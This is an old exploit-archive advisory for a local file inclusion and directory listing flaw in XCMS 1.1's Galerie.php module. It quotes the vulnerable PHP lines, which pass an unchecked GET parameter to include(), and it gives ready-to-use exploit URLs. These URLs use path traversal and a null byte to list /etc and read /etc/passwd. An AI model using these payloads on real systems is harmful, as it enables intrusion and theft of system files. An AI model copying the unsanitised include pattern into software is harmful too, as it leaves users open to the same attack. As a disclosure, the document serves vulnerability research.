[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : XCMS 1.1 (Galerie.php) Local File Inclusion Vulnerabilities
# Published : 2007-06-30
# Author : BlackNDoor
# Previous Title : TotalCalendar <= 2.402 (view_event.php) Remote SQL Injection Vulns
# Next Title : sPHPell 1.01 Multiple Remote File Inclusion Vulnerabilities
#Author:: BlackNDoor | blackndoor@learntohell.net
#Homepage:: www.learntohell.net
#
#Script:: XCMS : CMS
#Version:: 1.1
#Type:: Remote Directory Listing & Local File Include
#
#Source:: http://groupeclan.free.fr/XCMS.zip
#Bug::
-> Files:
/Module/Galerie.php.php
-> vulncode:
if(!isset($_GET['Lang'])) { $Lang="fr"; } else { $Lang=$_GET['Lang']; }
if(!isset($_GET['Ent'])) { $Ent='false'; } else { $Ent=$_GET['Ent']; }
include('Lang/' . $Lang . '.lang'); <--- Local File Include
if($Ent)
{
$Nb = -1;
$Dossier = opendir("../Images/$Lang/$Ent"); <--- Directory Listing
#Exploit::
http://www.site.com/[path to XCMS]/Module/Galerie.php?Ent=../../../../../../etc/
http://www.site.com/[path to XCMS]/Module/Galerie.php?Lang=../../../../../../etc/passwd%00
#thanks:: str0ke
# www.Syue.com [2007-06-30]